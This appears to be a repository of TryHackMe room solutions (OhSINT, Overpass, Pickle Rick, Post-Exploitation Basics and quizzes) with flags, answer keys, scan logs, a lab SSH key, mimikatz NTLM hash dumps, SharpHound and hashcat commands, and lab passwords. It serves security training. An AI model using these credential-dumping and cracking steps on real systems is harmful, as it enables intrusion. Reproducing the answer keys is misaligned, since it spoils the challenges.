/OhSINT/README.md: -------------------------------------------------------------------------------- 1 | # OhSINT | https://tryhackme.com/room/ohsint 2 | 3 | ### [Task 1] OhSINT 4 | 5 | What information can you possible get starting with just one photo? 6 | 7 | #1 What is this users avatar of? : ```cat``` 8 | 9 | #2 What city is this person in? : ```London``` 10 | 11 | #3 Whats the SSID of the WAP he connected to? : ```UnileverWiFi``` 12 | 13 | #4 What is his personal email address? : ```OWoodflint@gmail.com``` 14 | 15 | #5 What site did you find his email address on? : ```Github``` 16 | 17 | #6 Where has he gone on holiday? : ```New York``` 18 | 19 | #7 What is this persons password? : ```pennYDr0pper.!``` 20 | -------------------------------------------------------------------------------- /OhSINT/WindowsXP.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/OhSINT/WindowsXP.jpg -------------------------------------------------------------------------------- /OpenVPN/README.md: -------------------------------------------------------------------------------- 1 | OpenVPN | https://tryhackme.com/room/openvpn 2 | 3 | ### [Task 5] Check you're connected 4 | 5 | #1 What is the flag displayed on the deployed machine's website? : `flag{connection_verified}` 6 | -------------------------------------------------------------------------------- /Overpass/README.md: -------------------------------------------------------------------------------- 1 | # Overpass | https://tryhackme.com/room/overpass 2 | 3 | ### [Task 1] Overpass 4 | 5 | #1 Hack the machine and get the flag in user.txt : `thm{65c1aaf000506e56996822c6281e6bf7}` 6 | 7 | #2 Escalate your privileges and get the flag in root.txt : `thm{7f336f8c359dbac18d54fdd64ea753bb}` 8 | -------------------------------------------------------------------------------- /Overpass/gobuster.txt: -------------------------------------------------------------------------------- 1 | 301 - /admin 2 | 301 - /aboutus 3 | 301 - /css 4 | 301 - /downloads 5 | 301 - /img 6 | 301 - /index.html 7 | -------------------------------------------------------------------------------- /Overpass/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 4 | 5 | LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN 6 | JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 7 | 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT 8 | WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv 9 | BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ 10 | AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR 11 | 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf 12 | ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk 13 | VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR 14 | OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P 15 | 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze 16 | eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ 17 | 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8 18 | GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn 19 | exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy 20 | AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk 21 | 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 22 | dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i 23 | n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 24 | 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 25 | 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z 26 | ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS 27 | 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 28 | +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 29 | 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7 30 | -----END RSA PRIVATE KEY----- 31 | -------------------------------------------------------------------------------- /Overpass/id_rsa_hash: -------------------------------------------------------------------------------- 1 | id_rsa:$sshng$1$16$9F85D92F34F42626F13A7493AB48F337$1200$2cdbb9c10041cfba4a67771ce135a5c4852e0ffa29262d435693dad3aa708871e17bc663c37feffb19e6b52dcefaa88d2479cb4bca14551e929a8b30e29a8b19c3f70302afaf30d6b70db270eee635d36ccf02e9deeb68ec435d4c86f3bc96a5ef7fde50df64605d2e6bdad90ba9b0a08da21bab1d94d2f866ab1863baebbc3c5e099264833406ce407dc0a830d658d3583cb2f2a9dc963ba03887fc42b1e8a37d06bfe74031f8a94d2478dc518167f1e16b88c3ca45173f43efb85c936d576f04c5e6af7c6e2a407a23a93f8cb8ea59c2eb84f592d2a449ef5f06feef1ca985f7a0998cd0ea378e0a17617c5ec0649900be5b2d0161649346a19f8de671ce965d4e065d6d9ac50847060aef04fff64bd488bdeb8640544615486e3daa887c51dcac264b80e6e003ada0f4c802657268a9825a8a5fea57b5fb0cd9fd4a6b3420207864e564a5ff8e8aee5bb649b8051f0016d12cbc0554f3206a1ac1a7abd17cd1024b1ced6c59973e8570bd6450f7c67ea7c3223a845e6fb25fbaccba1af66455f5b68299a402bf320d0ca752e92859ec4f7831d6892960d644492ab40fec60aea6f5bfaff61cd5198d4dfcd3e5e7913a450e4ccaa67772e3d3bc842f26af9411ebcf9149bf33ccdeb8a647012c97c187d75d43e0be6b00a55cbac745720f0ff4142e9166f35591db690b401951b2d05289bf55a103ea634cbab053e735e5617b10d6f70e6e6a754a124a53f3463cde79a3c6e4ee14f45ab465a60f90c972242cd1569e370dee0a2a4c8ee4543ec52c5c7b7156d1beb7fbc4448188ab386719e13040a58faecf7e095def2312586b295f71c3fef31b62e890a3279631b6605200a6bf7d9d915566cd5738508291c33c18585ea13e32170ad7854d5f8d08d6fdc47491b84ebfb45f579c7b2f7eb1dd9b827c17655a4b7f8763399e8c2371b6277b1c4eb8e76a75acd38eb5cec913723ad605f563cb84b4476a9040917cef352384441dd325c6bcc9d6cab326ac7421b20083d7e766e2a01943860f0398f0294750b5cd16304f52c414ab7b28a01aa206f0dc6e6b692cc1e78310a57e962fec24ea9effc0e5fa58ca35325905f793370bb7713c512ca4b1dfa41c5fdaacacf4ca81b1dd2b2e45e8611ea0a5b19b016e7c74f9b9d4c7a41c3f9678ff284d8188e0f5424bf585f94f741adcb452683223da9fc4c548bb505c98987387c81db53d229f42f3e69298fab2f175468003d295c05b1d8979d78c7104d54c270eaaabbe006ebd7e8dbb1fa17e05e2f41b32ebca93f0789429312cba472ffc86072b5b3e530fc7e405ad26c166590b376f0f98e22c3e60b66899703813bcb13d7c9f5a6e0ae05320de78347b8ffb1d160949a5cb40e29e37071ffcb5b9762a4eec39818d52ec0bc7b227cba37aeb4ffc6700e65eb3ca5aa294e823e3eca24bcd7790d4e30893b0291b178368ca6e745af1bedd491cfb6836552e9267132f5b867e9aed6b52e3d4f14e88b9dd9075e3ea2e8242f8b2f272618211b908eb52689ead701d99b605f708a68662df7a5acc7287ce1d15b6fa12f5907953b49654f198f663663785deb244d25c220083ae62db9fd0b933477b83487606515a24864e6034ba27a624d9c5a4fcc967efe3a1000a40bc304a54ceff2c647dfec54f71e128b3a1d37c15db9ac895f9ea05cd4b6e8edca6bfc53b 2 | -------------------------------------------------------------------------------- /Overpass/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Aug 9 12:30:19 2020 as: nmap -sCVS -A -O -oN nmap_basic.nmap 10.10.108.198 2 | Nmap scan report for 10.10.108.198 3 | Host is up (0.23s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) 9 | | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) 10 | |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 11 | 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 12 | |_http-title: Overpass 13 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 14 | TCP/IP fingerprint: 15 | OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=31899%PV=Y%DS=2%DC=T%G=Y%TM=5F2F9F35 16 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(O 17 | OS:1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11N 18 | OS:W7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R 19 | OS:=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS% 20 | OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y 21 | OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R 22 | OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T= 23 | OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S 24 | OS:) 25 | 26 | Network Distance: 2 hops 27 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 28 | 29 | TRACEROUTE (using port 80/tcp) 30 | HOP RTT ADDRESS 31 | 1 231.50 ms 10.9.0.1 32 | 2 237.43 ms 10.10.108.198 33 | 34 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 35 | # Nmap done at Sun Aug 9 12:31:09 2020 -- 1 IP address (1 host up) scanned in 50.20 seconds 36 | -------------------------------------------------------------------------------- /Overpass/root.txt: -------------------------------------------------------------------------------- 1 | thm{7f336f8c359dbac18d54fdd64ea753bb} 2 | -------------------------------------------------------------------------------- /Overpass/ssh_creds.txt: -------------------------------------------------------------------------------- 1 | ssh -i id_rsa James@10.10.108.198 : James13 2 | -------------------------------------------------------------------------------- /Overpass/todo.txt: -------------------------------------------------------------------------------- 1 | To Do: 2 | > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough 3 | > Write down my password somewhere on a sticky note so that I don't forget it. 4 | Wait, we make a password manager. Why don't I just use that? 5 | > Test Overpass for macOS, it builds fine but I'm not sure it actually works 6 | > Ask Paradox how he got the automated build script working and where the builds go. 7 | They're not updating on the website 8 | -------------------------------------------------------------------------------- /Overpass/user.txt: -------------------------------------------------------------------------------- 1 | thm{65c1aaf000506e56996822c6281e6bf7} 2 | -------------------------------------------------------------------------------- /Pentest Questionaire/README.md: -------------------------------------------------------------------------------- 1 | # Pentest Questionaire | https://tryhackme.com/room/pentestquestionaire 2 | 3 | ### [Task 1] Do you know all the answers? 4 | 5 | Basic questions related to penetration testing 6 | 7 | #1 A very popular port scanner used in assessments : `nmap` 8 | 9 | #2 Flag used to load a list of hosts : `-iL` 10 | 11 | #3 Command line vulnerability scanner : `nikto` 12 | 13 | #4 Popular packet analyzer tool having a GUI : `wireshark` 14 | 15 | #5 Online platform to search for exploits. : `exploit-db` 16 | 17 | #6 First phase of the penetration test : `reconnaissance` 18 | 19 | #7 Common penetration testing framework used across multiple platforms : `metasploit` 20 | 21 | #8 A vulnerability assessment framework developed by Tenable : `nessus` 22 | 23 | #9 Automated tool to exploit SQL Injections : `sqlmap` 24 | 25 | #10 Vulnerability which when exploited can send commands to the operating system : `os injection` 26 | 27 | #11 A vulnerability which pops an alert box : `xss` 28 | 29 | #12 You do it horizontally and laterally : `privilege escalation` 30 | 31 | #13 Windows SMB exploit : `eternal blue` 32 | 33 | #14 Vulnerability by which the attacker can include local files (short name) : `lfi` 34 | 35 | #15 Vulnerability by which the attacker can include remote files(short name) : `rfi` 36 | -------------------------------------------------------------------------------- /PentestQuiz/README.md: -------------------------------------------------------------------------------- 1 | # PentestQuiz | https://tryhackme.com/room/pentestquiz 2 | 3 | ### [Task 1] Getting better at doing "Google Searches" 4 | 5 | Getting better at using "Search Engines" in order to find the right answers in less time is an art. This room is all about quick challenges which most of the n00bs like me already have in mind and don't really require a "Google Search" but for some of the n00bs it is still remained to be learnt! 6 | 7 | #1 Famous port scanner. Can you name it? : ```nmap``` 8 | 9 | #2 Famous network packet analyzer. Can you name it? : ```wireshark``` 10 | 11 | #3 Best place to find public exploits? : ```exploit-db``` 12 | 13 | #4 Best place to find google dorks? : ```ghdb``` 14 | 15 | #5 Entering enough data to make the application crash! : ```buffer overflow``` 16 | 17 | #6 I am a security bug but not known to anyone yet? : ```0day``` 18 | 19 | #7 "Your system has been locked, Pay me the money!" : ```ransomware``` 20 | 21 | #8 Group of compromised machines connected to a C&C server! : ```botnet``` 22 | 23 | #9 Name the organization that releases TOP 10 Web and Mobile vulnerabilities? : ```owasp``` 24 | 25 | #10 Name the famous worm which targeted SCADA environments? : ```stuxnet``` 26 | 27 | #11 Art of hiding information in other files! : ```steganography``` 28 | 29 | #12 Converting readable data into unreadable format! : ```encryption``` 30 | 31 | #13 Name the tool used for reading metadata of images! : ```exiftool``` 32 | 33 | #14 Famous Web Application Proxy Tool? : ```burp suite``` 34 | 35 | #15 NSA Reverse Engineering Tool? : ```Ghidra``` 36 | 37 | #16 Famous Open Source Web Application Proxy Tool? : ```OWASP ZAP``` 38 | -------------------------------------------------------------------------------- /Pickle Rick/README.md: -------------------------------------------------------------------------------- 1 | # Pickle Rick | https://tryhackme.com/room/picklerick 2 | 3 | ### [Task 1] Pickle Rick 4 | 5 | This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle. 6 | 7 | #1 What is the first ingredient Rick needs? : `mr. meeseek hair` 8 | 9 | #2 Whats the second ingredient Rick needs? : `1 jerry tear` 10 | 11 | #3 Whats the final ingredient Rick needs? : `fleeb juice` 12 | -------------------------------------------------------------------------------- /Pickle Rick/gobuster.txt: -------------------------------------------------------------------------------- 1 | ╭─root@kali ~/TryHackMe/Rooms/Pickle_Rick ‹master*› 2 | ╰─# gobuster dir -u 10.10.183.2 -w /usr/share/dirb/wordlists/common.txt 3 | =============================================================== 4 | Gobuster v3.0.1 5 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 6 | =============================================================== 7 | [+] Url: http://10.10.183.2 8 | [+] Threads: 10 9 | [+] Wordlist: /usr/share/dirb/wordlists/common.txt 10 | [+] Status codes: 200,204,301,302,307,401,403 11 | [+] User Agent: gobuster/3.0.1 12 | [+] Timeout: 10s 13 | =============================================================== 14 | 2020/05/25 17:22:02 Starting gobuster 15 | =============================================================== 16 | /.hta (Status: 403) 17 | /.htpasswd (Status: 403) 18 | /.htaccess (Status: 403) 19 | /assets (Status: 301) 20 | /index.html (Status: 200) 21 | /robots.txt (Status: 200) 22 | /server-status (Status: 403) 23 | =============================================================== 24 | 2020/05/25 17:23:46 Finished 25 | =============================================================== 26 | 27 | -------------------------------------------------------------------------------- /Pickle Rick/login.txt: -------------------------------------------------------------------------------- 1 | http://10.10.183.2/login.php 2 | 3 | http://10.10.183.2/portal.php 4 | -------------------------------------------------------------------------------- /Pickle Rick/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Mon May 25 17:19:46 2020 as: nmap -sCSV -A -O -oN nmap_basic.nmap -Pn 10.10.183.2 2 | Nmap scan report for 10.10.183.2 3 | Host is up (0.19s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 2a:05:08:61:53:b5:9e:c6:5f:6c:a1:79:a1:43:51:fb (RSA) 9 | | 256 87:48:b9:16:c9:2b:7f:27:19:33:cd:f4:55:6b:bb:54 (ECDSA) 10 | |_ 256 4b:95:e8:85:15:f5:60:f9:fa:3e:fe:3b:81:f6:81:93 (ED25519) 11 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 12 | |_http-server-header: Apache/2.4.18 (Ubuntu) 13 | |_http-title: Rick is sup4r cool 14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 15 | TCP/IP fingerprint: 16 | OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=37502%PV=Y%DS=2%DC=T%G=Y%TM=5ECBB12 17 | OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)SEQ 18 | OS:(SP=103%GCD=1%ISR=103%TI=Z%CI=I%TS=8)SEQ(SP=103%GCD=1%ISR=103%TI=Z%II=I% 19 | OS:TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5 20 | OS:=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6= 21 | OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% 22 | OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 23 | OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S 24 | OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R 25 | OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N 26 | OS:%T=40%CD=S) 27 | 28 | Network Distance: 2 hops 29 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 30 | 31 | TRACEROUTE (using port 30951/tcp) 32 | HOP RTT ADDRESS 33 | 1 193.81 ms 10.9.0.1 34 | 2 199.25 ms 10.10.183.2 35 | 36 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 37 | # Nmap done at Mon May 25 17:21:05 2020 -- 1 IP address (1 host up) scanned in 79.26 seconds 38 | -------------------------------------------------------------------------------- /Pickle Rick/robot.txt: -------------------------------------------------------------------------------- 1 | Wubbalubbadubdub 2 | -------------------------------------------------------------------------------- /Pickle Rick/username.txt: -------------------------------------------------------------------------------- 1 | Note to self, remember username! 2 | 3 | Username: R1ckRul3s 4 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/README.md: -------------------------------------------------------------------------------- 1 | # Post-Exploitation Basics | https://tryhackme.com/room/postexploit 2 | 3 | `ssh Administrator@10.10.159.61` : `P@$$W0rd` 4 | 5 | ### [Task 2] Enumeration w/ [Powerview](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/powerview/powerview.txt) 6 | 7 | #1 What is the shared folder that is not set by default? : `Share` 8 | 9 | #2 What operating system is running inside of the network besides Windows Server 2019? : `Windows 10 Enterprise Evaluation` 10 | 11 | #3 I've hidden a flag inside of the users find it : `POST{P0W3RV13W_FTW}` 12 | 13 | ### [Task 3] Enumeration w/ [Bloodhound](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/bloodhound/bloodhound.txt) 14 | 15 | #1 What service is also a domain admin : `SQLSERVICE` 16 | 17 | 18 | 19 | #2 What two users are Kerberoastable? : `SQLSERVICE, KRBTGT` 20 | 21 | 22 | 23 | ### [Task 4] Dumping hashes w/ [mimikatz](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/mimikatz.txt) 24 | 25 | #1 what is the Machine1 Password? : [`Password1`](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/hashcat.txt) 26 | 27 | #2 What is the Machine2 Hash? : `c39f2beb3d2ec06a62cb887fb391dee0` 28 | 29 | ### [Task 6] Enumeration w/ Server Manager 30 | 31 | 32 | 33 | 34 | 35 | #1 What tool allows to view the event logs? : `Event Viewer` 36 | 37 | 38 | 39 | #2 What is the SQL Service password : `MYpassword123#` 40 | 41 | 42 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/bloodhound/bloodhound.txt: -------------------------------------------------------------------------------- 1 | PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1 2 | PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip 3 | ----------------------------------------------- 4 | Initializing SharpHound at 1:19 AM on 8/13/2020 5 | ----------------------------------------------- 6 | 7 | Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container 8 | 9 | [+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL 10 | PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache 11 | 12 | [+] Pre-populating Domain Controller SIDS 13 | Status: 0 objects finished (+0) -- Using 94 MB RAM 14 | Status: 66 objects finished (+66 33)/s -- Using 99 MB RAM 15 | Enumeration finished in 00:00:02.5366752 16 | Compressing data to C:\Users\Administrator\20200813011952_loot.zip 17 | You can upload this file directly to the UI 18 | 19 | SharpHound Enumeration Completed at 1:19 AM on 8/13/2020! Happy Graphing! 20 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/bloodhound/kerberoastable-users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/kerberoastable-users.png -------------------------------------------------------------------------------- /Post-Exploitation-Basics/bloodhound/loot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/loot.zip -------------------------------------------------------------------------------- /Post-Exploitation-Basics/bloodhound/service.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/service.png -------------------------------------------------------------------------------- /Post-Exploitation-Basics/mimikatz/hashcat.txt: -------------------------------------------------------------------------------- 1 | hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt 2 | 3 | 64f12cddaa88057e06a81b54e73b949b = Password1 4 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/mimikatz/mimikatz.txt: -------------------------------------------------------------------------------- 1 | Microsoft Windows [Version 10.0.17763.737] 2 | (c) 2018 Microsoft Corporation. All rights reserved. 3 | 4 | controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe 5 | 6 | .#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51 7 | .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) 8 | ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 9 | ## \ / ## > http://blog.gentilkiwi.com/mimikatz 10 | '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) 11 | '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ 12 | 13 | mimikatz # privilege::debug 14 | Privilege '20' OK 15 | 16 | mimikatz # lsadump::lsa /patch 17 | Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 18 | 19 | RID : 000001f4 (500) 20 | User : Administrator 21 | LM : 22 | NTLM : 2777b7fec870e04dda00cd7260f7bee6 23 | 24 | RID : 000001f5 (501) 25 | User : Guest 26 | LM : 27 | NTLM : 28 | 29 | RID : 000001f6 (502) 30 | User : krbtgt 31 | LM : 32 | NTLM : 5508500012cc005cf7082a9a89ebdfdf 33 | 34 | RID : 0000044f (1103) 35 | User : Machine1 36 | LM : 37 | NTLM : 64f12cddaa88057e06a81b54e73b949b 38 | 39 | RID : 00000451 (1105) 40 | User : Admin2 41 | LM : 42 | NTLM : 2b576acbe6bcfda7294d6bd18041b8fe 43 | 44 | RID : 00000452 (1106) 45 | User : Machine2 46 | LM : 47 | NTLM : c39f2beb3d2ec06a62cb887fb391dee0 48 | 49 | RID : 00000453 (1107) 50 | User : SQLService 51 | LM : 52 | NTLM : f4ab68f27303bcb4024650d8fc5f973a 53 | 54 | RID : 00000454 (1108) 55 | User : POST 56 | LM : 57 | NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2 58 | 59 | RID : 00000457 (1111) 60 | User : sshd 61 | LM : 62 | NTLM : bb068638512ac1118ce7f78e92f49792 63 | 64 | RID : 000003e8 (1000) 65 | User : DOMAIN-CONTROLL$ 66 | LM : 67 | NTLM : 271a221ceb6f5879ee15143b56c96625 68 | 69 | RID : 00000455 (1109) 70 | User : DESKTOP-2$ 71 | LM : 72 | NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c 73 | 74 | RID : 00000456 (1110) 75 | User : DESKTOP-1$ 76 | LM : 77 | NTLM : 7d33346eeb11a4f12a6c201faaa0d89a 78 | 79 | mimikatz # 80 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/powerview/flag.txt: -------------------------------------------------------------------------------- 1 | POST{P0W3RV13W_FTW} 2 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/powerview/powerview.txt: -------------------------------------------------------------------------------- 1 | (c) 2018 Microsoft Corporation. All rights reserved. 2 | 3 | controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass 4 | 5 | Windows PowerShell 6 | 7 | Copyright (C) Microsoft Corporation. All rights reserved. 8 | 9 | PS C:\Users\Administrator> . .\Downloads\PowerView.ps1 10 | 11 | PS C:\Users\Administrator> Get-NetUser | select cn 12 | 13 | cn 14 | -- 15 | Administrator 16 | Guest 17 | krbtgt 18 | Machine-1 19 | Admin2 20 | Machine-2 21 | SQL Service 22 | POST{P0W3RV13W_FTW} 23 | sshd 24 | 25 | 26 | PS C:\Users\Administrator> Get-NetGroup -GroupName *admin* 27 | 28 | Administrators 29 | Hyper-V Administrators 30 | Storage Replica Administrators 31 | Schema Admins 32 | Enterprise Admins 33 | Domain Admins 34 | Key Admins 35 | Enterprise Key Admins 36 | DnsAdmins 37 | 38 | 39 | PS C:\Users\Administrator> get-netshare 40 | 41 | shi1_netname shi1_type shi1_remark 42 | ------------ --------- ----------- 43 | ADMIN$ 2147483648 Remote Admin 44 | C$ 2147483648 Default share 45 | IPC$ 2147483651 Remote IPC 46 | NETLOGON 0 Logon server share 47 | Share 0 48 | SYSVOL 0 Logon server share 49 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/server-manager/dashbord.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/dashbord.png -------------------------------------------------------------------------------- /Post-Exploitation-Basics/server-manager/event-logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/event-logs.png -------------------------------------------------------------------------------- /Post-Exploitation-Basics/server-manager/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/login.png -------------------------------------------------------------------------------- /Post-Exploitation-Basics/server-manager/rdesktop.txt: -------------------------------------------------------------------------------- 1 | rdesktop -u SG 10.10.92.133 2 | -------------------------------------------------------------------------------- /Post-Exploitation-Basics/server-manager/sql-service-password.png: -------------------------------------------------------------------------------- 